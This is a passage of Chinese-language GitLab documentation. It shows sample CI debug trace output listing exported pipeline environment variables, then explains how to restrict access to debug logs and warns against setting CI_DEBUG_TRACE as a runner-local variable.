++ export CI_SERVER_PROTOCOL=https
++ CI_SERVER_PROTOCOL=https
++ export CI_SERVER_NAME=GitLab
++ CI_SERVER_NAME=GitLab
++ export GITLAB_FEATURES=audit_events,burndown_charts,code_owners,contribution_analytics,description_diffs,elastic_search,group_bulk_edit,group_burndown_charts,group_webhooks,issuable_default_templates,issue_weights,jenkins_integration,ldap_group_sync,member_lock,merge_request_approvers,multiple_issue_assignees,multiple_ldap_servers,multiple_merge_request_assignees,protected_refs_for_users,push_rules,related_issues,repository_mirrors,repository_size_limit,scoped_issue_board,usage_quotas,visual_review_app,wip_limits,adjourned_deletion_for_projects_and_groups,admin_audit_log,auditor_user,batch_comments,blocking_merge_requests,board_assignee_lists,board_milestone_lists,ci_cd_projects,cluster_deployments,code_analytics,code_owner_approval_required,commit_committer_check,cross_project_pipelines,custom_file_templates,custom_file_templates_for_namespace,custom_project_templates,custom_prometheus_metrics,cycle_analytics_for_groups,db_load_balancing,default_project_deletion_protection,dependency_proxy,deploy_board,design_management,email_additional_text,extended_audit_events,external_authorization_service_api_management,feature_flags,file_locks,geo,github_integration,group_allowed_email_domains,group_project_templates,group_saml,issues_analytics,jira_dev_panel_integration,ldap_group_sync_filter,merge_pipelines,merge_request_performance_metrics,merge_trains,metrics_reports,multiple_approval_rules,multiple_group_issue_boards,object_storage,operations_dashboard,packages,productivity_analytics,project_aliases,protected_environments,reject_unsigned_commits,required_ci_templates,scoped_labels,service_desk,smartcard_auth,group_timelogs,type_of_work_analytics,unprotection_restrictions,ci_project_subscriptions,container_scanning,dast,dependency_scanning,epics,group_ip_restriction,incident_management,insights,license_management,personal_access_token_expiration_policy,pod_logs,prometheus_alerts,report_approver_rules,sast,security_dashboard,tracing,web_ide_terminal
++ GITLAB_FEATURES=audit_events,burndown_charts,code_owners,contribution_analytics,description_diffs,elastic_search,group_bulk_edit,group_burndown_charts,group_webhooks,issuable_default_templates,issue_weights,jenkins_integration,ldap_group_sync,member_lock,merge_request_approvers,multiple_issue_assignees,multiple_ldap_servers,multiple_merge_request_assignees,protected_refs_for_users,push_rules,related_issues,repository_mirrors,repository_size_limit,scoped_issue_board,usage_quotas,visual_review_app,wip_limits,adjourned_deletion_for_projects_and_groups,admin_audit_log,auditor_user,batch_comments,blocking_merge_requests,board_assignee_lists,board_milestone_lists,ci_cd_projects,cluster_deployments,code_analytics,code_owner_approval_required,commit_committer_check,cross_project_pipelines,custom_file_templates,custom_file_templates_for_namespace,custom_project_templates,custom_prometheus_metrics,cycle_analytics_for_groups,db_load_balancing,default_project_deletion_protection,dependency_proxy,deploy_board,design_management,email_additional_text,extended_audit_events,external_authorization_service_api_management,feature_flags,file_locks,geo,github_integration,group_allowed_email_domains,group_project_templates,group_saml,issues_analytics,jira_dev_panel_integration,ldap_group_sync_filter,merge_pipelines,merge_request_performance_metrics,merge_trains,metrics_reports,multiple_approval_rules,multiple_group_issue_boards,object_storage,operations_dashboard,packages,productivity_analytics,project_aliases,protected_environments,reject_unsigned_commits,required_ci_templates,scoped_labels,service_desk,smartcard_auth,group_timelogs,type_of_work_analytics,unprotection_restrictions,ci_project_subscriptions,cluster_health,container_scanning,dast,dependency_scanning,epics,group_ip_restriction,incident_management,insights,license_management,personal_access_token_expiration_policy,pod_logs,prometheus_alerts,report_approver_rules,sast,security_dashboard,tracing,web_ide_terminal
++ export CI_PROJECT_ID=17893
++ CI_PROJECT_ID=17893
++ export CI_PROJECT_NAME=ci-debug-trace
++ CI_PROJECT_NAME=ci-debug-trace
...
```

#### 限制对 debug 日志的访问

> - 引入于 13.7 版本。
> - 功能标志移除于 13.8 版本。

您可以限制对 debug 日志的访问。当受到限制时，只有具有开发人员或更高权限的用户才能在使用以下变量，启用 debug 日志记录时查看作业日志：

- `.gitlab-ci.yml` 文件<!--[`.gitlab-ci.yml` 文件](#create-a-custom-cicd-variable-in-the-gitlab-ciyml-file)-->。
- GitLab UI 中设置的 CI/CD 变量。

WARNING:
如果您将 `CI_DEBUG_TRACE` 作为局部变量添加到 runner，debug 日志会生成，并对所有有权访问作业日志的用户可见。Runner 不会检查权限级别，因此您应该只在 GitLab 本身中使用该变量。
